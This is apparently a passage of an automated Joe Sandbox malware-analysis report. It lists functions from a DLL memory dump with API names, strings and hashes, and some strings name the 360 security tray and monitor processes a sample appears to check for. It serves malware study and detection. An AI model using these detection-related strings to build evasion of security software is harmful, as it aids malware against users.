                                                                  Function 0000000180004288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
                                                                  • String ID: :
                                                                  • API String ID: 2941325240-336475711
                                                                  • Opcode ID: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
                                                                  • Instruction ID: dc65f2bc49bddac93e31888ce9d3fd3537e0c7ef9c239f6ea7558133a88505f1
                                                                  • Opcode Fuzzy Hash: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
                                                                  • Instruction Fuzzy Hash: 7731747260458881EAB5DB16E4543ED7361FB8CBC4F44D115FA4E86AA5DF3CCB49C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180060A0C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ClassNameTextWindowmemset
                                                                  • String ID: ApplicationFrameWindow$Microsoft Edge
                                                                  • API String ID: 1817102812-2764675319
                                                                  • Opcode ID: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
                                                                  • Instruction ID: cbb3fe303a1e4ce820f684c33e5910fd11efe3c021ca595ae8cabc946684c7f6
                                                                  • Opcode Fuzzy Hash: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
                                                                  • Instruction Fuzzy Hash: 3721943135478985FAA19F65E8843DA6361F78C7C4F648125AAAD872A4EF7CC74DC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180008B5C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66libraryloaderregistryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc$Delete
                                                                  • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                  • API String ID: 2668475584-1053001802
                                                                  • Opcode ID: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
                                                                  • Instruction ID: 915c5fbfce3db82b286e5c0612373c0c02ac60b4c6bcd7d6af2be75d68b23045
                                                                  • Opcode Fuzzy Hash: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
                                                                  • Instruction Fuzzy Hash: 9F314675209A4891FBA2CB11EC047D973A0BB4DBD4F58C025AE9A07BA4EF3CC748D310
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005F270 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54filewindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$View$CloseFindHandleMappingMessageOpenSendTimeoutUnmapWindow
                                                                  • String ID: Q360GameModeMapping$Q360SafeMonClass
                                                                  • API String ID: 503113698-2755034037
                                                                  • Opcode ID: a3dcdb3015a9b5e320c6dba5c7c91f5af997ec56152cc96ca9df43ba5da0b2dd
                                                                  • Instruction ID: ebb1f5daab1ae0be3269addd9342b9779a07a1984474038a4b34f5f783d133e4
                                                                  • Opcode Fuzzy Hash: a3dcdb3015a9b5e320c6dba5c7c91f5af997ec56152cc96ca9df43ba5da0b2dd
                                                                  • Instruction Fuzzy Hash: 65213E36605B4882FBA28F25B9547AAB7A1F78C7C4F458228FA4942B54DF3CD64CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180064DE4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
                                                                  • String ID: ..\deepscan\$speedmem2.hg
                                                                  • API String ID: 2338990259-1390971677
                                                                  • Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                  • Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
                                                                  • Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                  • Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004242C Relevance: 13.7, APIs: 9, Instructions: 156networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionhtonlhtons$EnterLeavememmove
                                                                  • String ID:
                                                                  • API String ID: 33644419-0
                                                                  • Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                  • Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
                                                                  • Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                  • Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180014F24 Relevance: 13.6, APIs: 9, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant$ArraySafe$CreateElement
                                                                  • String ID:
                                                                  • API String ID: 3308809976-0
                                                                  • Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                  • Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
                                                                  • Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                  • Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001E59C Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 311COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsicmp
                                                                  • String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
                                                                  • API String ID: 2081463915-3789319691
                                                                  • Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                  • Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
                                                                  • Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                  • Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180036EC8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 238COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
                                                                  • String ID: clsid$clsid2
                                                                  • API String ID: 2934854147-3646038404
                                                                  • Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                  • Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
                                                                  • Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                  • Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003721C Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 234stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: strchrwcscmpwcsstr$FromHeapProcessString_strlwr
                                                                  • String ID: clsid$clsid2
                                                                  • API String ID: 3075496951-3646038404
                                                                  • Opcode ID: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
                                                                  • Instruction ID: 52fbb44663529e4af6cb5c57c7c12c2662acde33668ab69cc9482a834562ed8e
                                                                  • Opcode Fuzzy Hash: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
                                                                  • Instruction Fuzzy Hash: B3A14E72301A4886EBA79B25C4503EE67A1BB49BD8F45C121FA1D477D6EF78CA89C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180068390 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@memmovememset
                                                                  • String ID: generic$unknown error
                                                                  • API String ID: 2528313377-3628847473
                                                                  • Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                  • Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
                                                                  • Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                  • Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800744F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                  • String ID: AddDllDirectory$kernel32
                                                                  • API String ID: 1437655972-3758863895
                                                                  • Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                  • Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
                                                                  • Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                  • Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180040688 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
                                                                  • String ID: arm64$x64$x86
                                                                  • API String ID: 4069188616-280937049
                                                                  • Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                  • Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
                                                                  • Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                  • Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180040E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
                                                                  • String ID: IsWow64Process2$Kernel32.dll
                                                                  • API String ID: 1364622999-2175735969
                                                                  • Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                  • Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
                                                                  • Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                  • Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003C6D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
                                                                  • String ID: InitLibs
                                                                  • API String ID: 388043826-2748520195
                                                                  • Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                  • Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
                                                                  • Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                  • Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001B004 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileName_wcsicmp$FindModulePathmemset
                                                                  • String ID: 360tray.exe$QHSafeTray.exe
                                                                  • API String ID: 2436975468-72543816
                                                                  • Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                  • Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
                                                                  • Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                  • Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005A8D8 Relevance: 12.1, APIs: 8, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection_time64$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3499907473-0
                                                                  • Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                  • Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
                                                                  • Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                  • Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180074200 Relevance: 12.1, APIs: 8, Instructions: 98COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
